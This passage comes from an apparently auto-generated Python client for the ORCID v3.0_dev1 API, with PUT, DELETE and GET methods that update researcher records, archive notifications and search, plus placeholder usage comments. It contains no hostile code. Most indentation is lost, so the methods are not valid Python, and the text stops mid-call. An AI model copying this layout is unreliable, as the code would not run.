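    # Sketch only: a keyword entry is replaced wholesale by PUTting the edited
    # model back under its put code (`keyword` is a Keyword model; the other
    # values are placeholders):
    #
    #   api.edit_keyword_json('0000-0002-1825-0097', '3', body=keyword)
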
def edit_other_name_json(self, orcid, put_code, **kwargs):
"""
Edit other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_other_name_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_other_name_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_other_name_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_other_name_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_other_name_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_other_name_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_other_name_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_other_name_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
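
    # Hypothetical usage, with `other_name` an OtherName model holding the
    # corrected value and placeholder identifiers:
    #
    #   api.edit_other_name_json('0000-0002-1825-0097', '8', body=other_name)
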
def edit_researcher_url_json(self, orcid, put_code, **kwargs):
"""
        Edit a researcher URL for an ORCID ID
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_researcher_url_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_researcher_url_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_researcher_url_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_researcher_url_json_with_http_info(self, orcid, put_code, **kwargs):
"""
        Edit a researcher URL for an ORCID ID
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.edit_researcher_url_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_researcher_url_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_researcher_url_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_researcher_url_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
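
    # Example under stated assumptions (`ru` is a ResearcherUrl model; the iD
    # and put code are placeholders):
    #
    #   api.edit_researcher_url_json('0000-0002-1825-0097', '4321', body=ru)
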
def flag_as_archived_permission_notification(self, orcid, id, **kwargs):
"""
Archive a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.flag_as_archived_permission_notification(orcid, id, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.flag_as_archived_permission_notification_with_http_info(orcid, id, **kwargs)
else:
(data) = self.flag_as_archived_permission_notification_with_http_info(orcid, id, **kwargs)
return data
def flag_as_archived_permission_notification_with_http_info(self, orcid, id, **kwargs):
"""
Archive a notification
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.flag_as_archived_permission_notification_with_http_info(orcid, id, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param int id: (required)
:return: Notification
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method flag_as_archived_permission_notification" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `flag_as_archived_permission_notification`")
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `flag_as_archived_permission_notification`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/notification-permission/{id}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['orcid_two_legs']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Notification',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
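
    # Note the asymmetry above: archiving is expressed as an HTTP DELETE on the
    # notification resource and, unlike most methods in this class, it uses the
    # `orcid_two_legs` auth setting and deserializes a Notification. A hedged
    # sketch with placeholder values:
    #
    #   notification = api.flag_as_archived_permission_notification(
    #       '0000-0002-1825-0097', 42)
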
def search_by_query_xml(self, **kwargs):
"""
Search records
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.search_by_query_xml(callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str q:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.search_by_query_xml_with_http_info(**kwargs)
else:
(data) = self.search_by_query_xml_with_http_info(**kwargs)
return data
def search_by_query_xml_with_http_info(self, **kwargs):
"""
Search records
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.search_by_query_xml_with_http_info(callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str q:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_by_query_xml" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q' in params:
query_params['q'] = params['q']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
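
    # Illustrative search call; the query string below is a guess at typical
    # ORCID/Solr field syntax, not something taken from this file:
    #
    #   api.search_by_query_xml(q='family-name:Carberry')
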
def update_education_json(self, orcid, put_code, **kwargs):
"""
Update an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_education_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Education body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_education_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_education_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_education_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_education_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Education body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_education_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_education_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_education_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
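
    # Minimal sketch, assuming `education` is an Education model fetched
    # earlier and modified in place (identifiers are placeholders):
    #
    #   api.update_education_json('0000-0002-1825-0097', '100', body=education)
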
def update_employment_json(self, orcid, put_code, **kwargs):
"""
Update an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_employment_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Employment body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_employment_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_employment_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_employment_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_employment_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Employment body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_employment_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_employment_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_employment_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
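
    # Hypothetical call mirroring the education example, with `employment` an
    # Employment model and placeholder identifiers:
    #
    #   api.update_employment_json('0000-0002-1825-0097', '101',
    #                              body=employment)
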
def update_funding_json(self, orcid, put_code, **kwargs):
"""
Update a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_funding_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Funding body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_funding_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_funding_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_funding_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_funding_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Funding body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_funding_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_funding_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_funding_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
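
    # Sketch only (placeholder identifiers): the funding item to replace is
    # addressed purely by ORCID iD plus put code, with `funding` a Funding
    # model:
    #
    #   api.update_funding_json('0000-0002-1825-0097', '102', body=funding)
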
def update_group_id_record_json(self, put_code, **kwargs):
"""
Update a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_group_id_record_json(put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str put_code: (required)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_id_record_json_with_http_info(put_code, **kwargs)
else:
(data) = self.update_group_id_record_json_with_http_info(put_code, **kwargs)
return data
def update_group_id_record_json_with_http_info(self, put_code, **kwargs):
"""
Update a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_group_id_record_json_with_http_info(put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str put_code: (required)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_id_record_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_group_id_record_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
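
    # Unlike the record-level update methods, this one takes no ORCID iD: the
    # group is addressed by put code alone. Illustrative call with `record` a
    # GroupIdRecord model and a placeholder put code:
    #
    #   api.update_group_id_record_json('200', body=record)
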
def update_peer_review_json(self, orcid, put_code, **kwargs):
"""
Update a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_peer_review_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PeerReview body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_peer_review_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_peer_review_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_peer_review_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_peer_review_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PeerReview body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_peer_review_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_peer_review_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_peer_review_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
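
    # Hedged example, with `review` a PeerReview model carrying the edits and
    # placeholder identifiers:
    #
    #   api.update_peer_review_json('0000-0002-1825-0097', '103', body=review)
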
def update_work_json(self, orcid, put_code, **kwargs):
"""
Update a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_work_json(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Work body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_work_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.update_work_json_with_http_info(orcid, put_code, **kwargs)
return data
def update_work_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Update a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
        >>> def callback_function(response):
        ...     pprint(response)
        ...
        >>> thread = api.update_work_json_with_http_info(orcid, put_code, callback=callback_function)
        :param function callback: The callback function
            for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Work body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_work_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `update_work_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `update_work_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
